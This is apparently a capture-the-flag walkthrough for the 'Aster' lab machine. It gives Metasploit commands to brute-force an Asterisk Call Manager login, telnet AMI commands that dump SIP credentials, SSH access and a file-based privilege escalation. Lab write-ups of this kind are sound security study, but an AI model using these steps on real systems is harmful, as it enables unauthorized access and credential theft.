Aster
Introduction
Hack my server dedicated for building communications applications.
Enumeration
We always start scanning our IP to find open ports with NMAP.
The ones who grabs attention is the port 80 (Aster).
We will go ahead and download and open the file (since it is begging for us to do so 😀)
We first will need to decompile using this tool.
pip3 install uncompyle6
The installation won't add to the PATH so we need to use his installation location.
on my machine /home/kali/.local/bin/uncompyled6 NAME_OF_THE_FILE > output.py
We can run the file python3 output.py but it won't give us much. (If you run into an error, it is because you need to add ( ) to the print function as for python3 requests).
However after fixing -> adding two additional printing functions.
We get:
Now we know the username:admin. Also another tip, he states that there is another service (communications) running in the sever - Port 5038. Which we will user the username.
Googling Exploit Asterisk Call Manager 5.0.2 we get on how to exploit this service with Metasploit.
Exploitation
USER.TXT
Let's set up our Metasploit Console and use the commands shown in the website:
sudo msfconsole
use auxiliary/voip/asterisk_login
show options
set username admin
set rhosts IP
set stop_on_success true
run
Now that we know the password:abc123 we can connect to the IP via telnet:
telnet IP 5038
Some messages will appear, than:
action:login
username:admin
secret:abc123
Will show authentication accepted, than we type:
action:command
command:sip show users
Which will show us another credential harry:p4ss#w0rd!# and we can use it to SSH to the machine.
We will now SSH with ssh harry@IP and insert the password. Than we will see the user.txt using the command ls.
ROOT.TXT
As it is most probable, the way to escalate to root privileges is through the interesting file Example_Root.jar. To run a jar file we use the following command:
java -jar Example_Root.jar
However it will throw an error message.
We will move the file to our Kali machine in order to decompile and read the source code.
On the Attacker machine we will open an http server on port 8000:
python3 -m http.server 8000
On our Kali machine we will download the file using the wget command:
wget http://<HOST_IP>:8000/Example_Root.jar
Now we will use the following tool to decompile.
After reading a bit the code, we can see it returns true if there is a file named flag.dat under the folder tmp.
We go back to the attacker machine and do the following:
touch /tmp/flag.dat
Now we rerun the jar file:
Java -jar Example_Root.jar
We than do:
ls
And we got the root.txt!
